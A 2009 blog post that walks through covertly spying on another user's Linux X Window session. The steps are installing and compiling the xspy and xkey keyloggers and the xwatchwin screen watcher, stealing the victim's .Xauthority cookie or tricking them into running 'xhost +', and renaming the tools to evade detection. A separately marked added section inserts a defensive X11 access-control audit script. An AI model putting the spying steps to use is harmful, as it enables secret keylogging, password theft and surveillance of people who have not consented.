The Barcode Reader

Just another weblog

How to secretly watch a user in X Windows


Let’s assume that you want to know what a particular user is doing on his computer while running some form of Linux and the X Window environment. Let’s further assume that you want to do so secretly, and that you have root access to the machine in question. If you don’t have root access then you need at least a local account on the machine and some social engineering skills. I’ll explain in a minute.

With root access there are probably several other options available which I won’t go into here. One approach that might work is x11vnc, which connects to the X Window console using the VNC protocol. I haven’t tried this yet and I can make no guarantees that this approach cannot be easily detected by the victim of your little espionage.

Obtaining the tools

xwatchwin.tar.gz   (watch any window on the victim’s display)

xspy.tar.gz   (keylogger)

xkey.c   (another keylogger)

The reason why I have included two keyloggers is that both have strengths and weaknesses. While xspy sometimes misses keystrokes if the user is typing really fast, xkey fails to register keystrokes which are typed in secured fields like the kdesu dialog box. Take your pick or use them both.

Copy the files to the victim’s computer:

$ scp xwatchwin.tar.gz xspy.tar.gz xkey.c

where „yourname“ is either root or your account on the victim’s machine. Now log on and extract the files:

$ ssh -X -Y
$ tar -xvzf xwatchwin.tar.gz; tar -xvzf xspy.tar.gz


Next you need to compile these little programs.  Let’s start with xwatchwin:

$ xmkmf
$ make

This will give you the compiled binary xwatchwin. The program xspy is a little trickier. At least on my machine compiling it generates an error in usleep.c: ‚NULL‘ undeclared. So first edit the file usleep.c by adding a line at the beginning:

$ echo '#define NULL 0' >tmp
$ cat usleep.c >>tmp
$ mv tmp usleep.c
$ xmkmf
$ make

This will result in the compiled binary xspy. Finally compile xkey.c:

$ gcc -o xkey xkey.c -lX11 -lm -L/usr/X11R6/lib/

Getting access to the victim’s display

A quick test with

$ xdpyinfo -display :0

will probably give you an error message. If you are logged in as root then the fix is easy:

$ cat /home/victim/.Xauthority >>~/.Xauthority

Replace „victim“ with the login name of the user running the X Window session. Now try the test again; it should run without errors.

If you are not logged in as root then you’ll have to convince your victim to enable local access to the display by making him type

$ xhost local:

or alternatively

$ xhost +

into a terminal window. This is where your social engineering skills come in. Nowadays most Linux distributions start the X11 server with the -nolisten tcp flag. This protects the local display from access over the network, even after all access control has been disabled with xhost +. In earlier days this simple command made it possible to spy on somebody remotely without the need for a local account, let alone root access. Some systems reportedly even shipped with xhost + as the default setting. Ah, the good old days.
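Seen from the defender's side, both settings this section relies on (host-based rules added with xhost, and the server's -nolisten tcp flag) can be audited. The script below is an added example, not part of the original post; the function names and sample inputs are constructed, and the -listen tcp check assumes a newer X.Org server that accepts that flag.

```shell
#!/bin/sh
# Added example: audit X11 access-control settings. Sample inputs are constructed.

# audit_xhost: read `xhost` output on stdin and print one finding per rule
# that bypasses the per-user Xauthority cookie.
# Returns 0 if no such rule is present, 1 otherwise.
audit_xhost() {
    ax_rc=0
    while IFS= read -r ax_line; do
        case "$ax_line" in
            "access control disabled"*)
                echo "CRITICAL: access control is off (xhost +)"; ax_rc=1 ;;
            LOCAL:*)
                echo "WARN: every local user may connect (xhost local:)"; ax_rc=1 ;;
            INET:*|INET6:*)
                echo "WARN: host-based entry $ax_line"; ax_rc=1 ;;
        esac
    done
    return "$ax_rc"
}

# audit_xserver_args: take the X server command line as $1.
# Returns 0 if TCP listening is explicitly disabled, 1 if it is explicitly
# enabled, 2 if neither flag is present (result depends on the server default).
audit_xserver_args() {
    case " $1 " in
        *" -listen tcp "*)
            echo "WARN: X server listens on TCP"; return 1 ;;
        *" -nolisten tcp "*)
            echo "OK: TCP listening disabled"; return 0 ;;
        *)
            echo "INFO: no explicit flag, check the server default"; return 2 ;;
    esac
}

# Demo on constructed input: SI:localuser entries are per-user and not flagged.
audit_xhost <<'EOF' || true
access control enabled, only authorized clients can connect
LOCAL:
SI:localuser:alice
EOF
audit_xserver_args "/usr/lib/xorg/Xorg :0 -nolisten tcp -auth /run/user/1000/xauth" || true
```

On a live session, run `xhost | audit_xhost` as the logged-in user and pass the server's command line (for example from `ps -o args= -C Xorg`) to audit_xserver_args.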

Start watching

Before you run these programs I highly recommend that you rename them to something inconspicuous like „screen“ or anything that wouldn’t raise suspicion in a process listing. For clarity I will use the original name.

First start the keyloggers. Try xspy -help for a short list of command line options. To watch what the victim is typing in real time use one of these commands:

$ xspy -display :0
$ xkey :0

For best results run them both concurrently and redirect the output to a file:

$ xspy -display :0 >~/log1 &
$ xkey :0 >~/log2 &

Now let’s watch what is happening on the victim’s display or in a particular window. xwatchwin comes with its own man page in the xwatchwin directory.

$ man -l

The program requires a window name or window id. To get a full listing of all windows and their corresponding window ids use the command

$ xwininfo -display :0 -root -children

The root window, which corresponds to the whole display as seen by the victim, has no name, so you need to find its window id in the output of the xwininfo command. Then start xwatchwin using this rootID:

$ xwatchwin :0 -w rootID

You can use xwatchwin with the -u option to specify how often (in seconds) the image of the watched window will be redrawn. A longer interval results in a lower load on the victim’s machine.


Written by barcodereader

February 19, 2009 at 8:50 pm

Posted in Linux, X Windows
